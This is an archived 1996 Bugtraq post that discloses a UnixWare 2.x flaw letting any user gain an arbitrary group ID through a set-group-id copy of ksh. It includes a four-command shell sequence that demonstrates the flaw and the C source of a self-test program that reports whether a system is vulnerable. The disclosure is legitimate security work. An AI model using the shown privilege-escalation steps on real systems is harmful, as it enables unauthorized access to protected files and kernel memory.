Bugtraq mailing list archives
More on the UnixWare problem
From: tv () pobox com (Todd Vierling)
Date: Fri, 23 Aug 1996 16:11:25 -0400
I'm afraid to do this, but all, here's the source to that binary I posted. Read it and gasp. :( The vendor's been notified but it'll be a while before I see action. I've contacted them; there's a trouble ticket open; I've also just learned that someone has leaked the details and it's flowing around the net already. CRINGE! You'll note that I took pains to hide the program's function, for good reason. I'd been through runaround at SCO for some time (I spent more than an hour on hold today alone <yikes>), but finally it was demonstrated to me by the following command sequence by a kind SCO engineer that on UnixWare 2.x (not just 2.0x, but 2.1 as well), the set-group-id privilege can be compromised by *any user*. % cp /usr/bin/ksh . % chmod 2700 ./ksh % chgrp 23456 ./ksh % ./ksh
id
And 'id' reports effective group ID of 23456. Oh, s**t. Watch out,
/dev/kmem. How about mode 775 directories? What, you say /usr/bin comes
that way by default, group 'bin'? Someone get me a bottle of Advil. Oh,
it's a high-security system? Make that a double--of codeine.
=====
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#define KEYMATCH "\x1D\xFC\x3A\x2FMZ"
#define TESTGRP 17186
int main(int argc, char **argv) {
struct stat st, *s = &st;
pid_t p;
if (argc == 2 && !strcmp(argv[1], KEYMATCH)) {
if (getegid() == TESTGRP) {
unsigned long r;
srandom(time(NULL));
r = (unsigned long)random();
r = (r & 0xFFFF00FF) | ((r & 0xFF000000 >> 16) ^
(r & 0x00FF0000 >> 8) ^
(r & 0x000000FF << 8));
fprintf(stderr, "%s: system vulnerable code 0x%lX\n",
argv[0], r);
} else {
fprintf(stderr, "%s: system not vulnerable\n",
argv[0]);
}
return 0;
}
if (argc > 1) {
fprintf(stderr, "%s: don't supply any arguments\n", argv[0]);
return 0;
}
if (!strchr(argv[0], '/')) {
fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n",
argv[0]);
return 0;
}
if (stat(argv[0], s)) {
fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]);
return 0;
}
if (s->st_uid != geteuid() && s->st_uid != getuid()) {
fprintf(stderr, "%s: user error: does this uid own my binary?\n",
argv[0]);
return 0;
}
chown(argv[0], -1, TESTGRP);
if (chmod(argv[0], 02700)) {
chown(argv[0], -1, s->st_gid);
chmod(argv[0], s->st_mode);
fprintf(stderr, "%s: user error: cannot chmod my own binary?\n",
argv[0]);
return 0;
}
if ((p = vfork()) == -1) {
fprintf(stderr, "%s: system error: cannot fork\n",
argv[0]);
return 0;
}
if (!p) {
execl(argv[0], argv[0], KEYMATCH, NULL);
fprintf(stderr, "%s: system error: cannot exec\n",
argv[0]);
_exit(0);
}
chown(argv[0], -1, s->st_gid);
chmod(argv[0], s->st_mode);
return 0;
}
=====
== Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
Current thread:
- BUG in /bin/bash Seven Up (Aug 22)
- <Possible follow-ups>
- Re: BUG in /bin/bash Red Barchetta (Aug 22)
- Re: BUG in /bin/bash The Ghost who Admins (Aug 22)
- Re: BUG in /bin/bash Digital Dreamer (Aug 22)
- Re: BUG in /bin/bash Earle Ake (Aug 22)
- IE 3.0? InterAccess Support Manager (Aug 22)
- Re: IE 3.0? Dave Andersen (Aug 23)
- More on the UnixWare problem Todd Vierling (Aug 23)
- resolv+ and finger... C. Hodges (Aug 23)
- Vulnerability in the Xt library Aleph One (Aug 24)
- Re: Vulnerability in the Xt library Stefan `Sec` Zehl (Aug 25)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 27)
- Re: Vulnerability in the Xt library Casper Dik (Aug 28)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 28)
- RFD: libsuid VaX#n8 (Aug 24)
- More on UnixWare 2.x vulnerability Todd Vierling (Aug 24)
- Re: (WORKAROUND) More on UnixWare 2.x vulnerability Hannu Laurila (Aug 24)
- polyglots (multi-language programs) John Nemeth (Aug 24)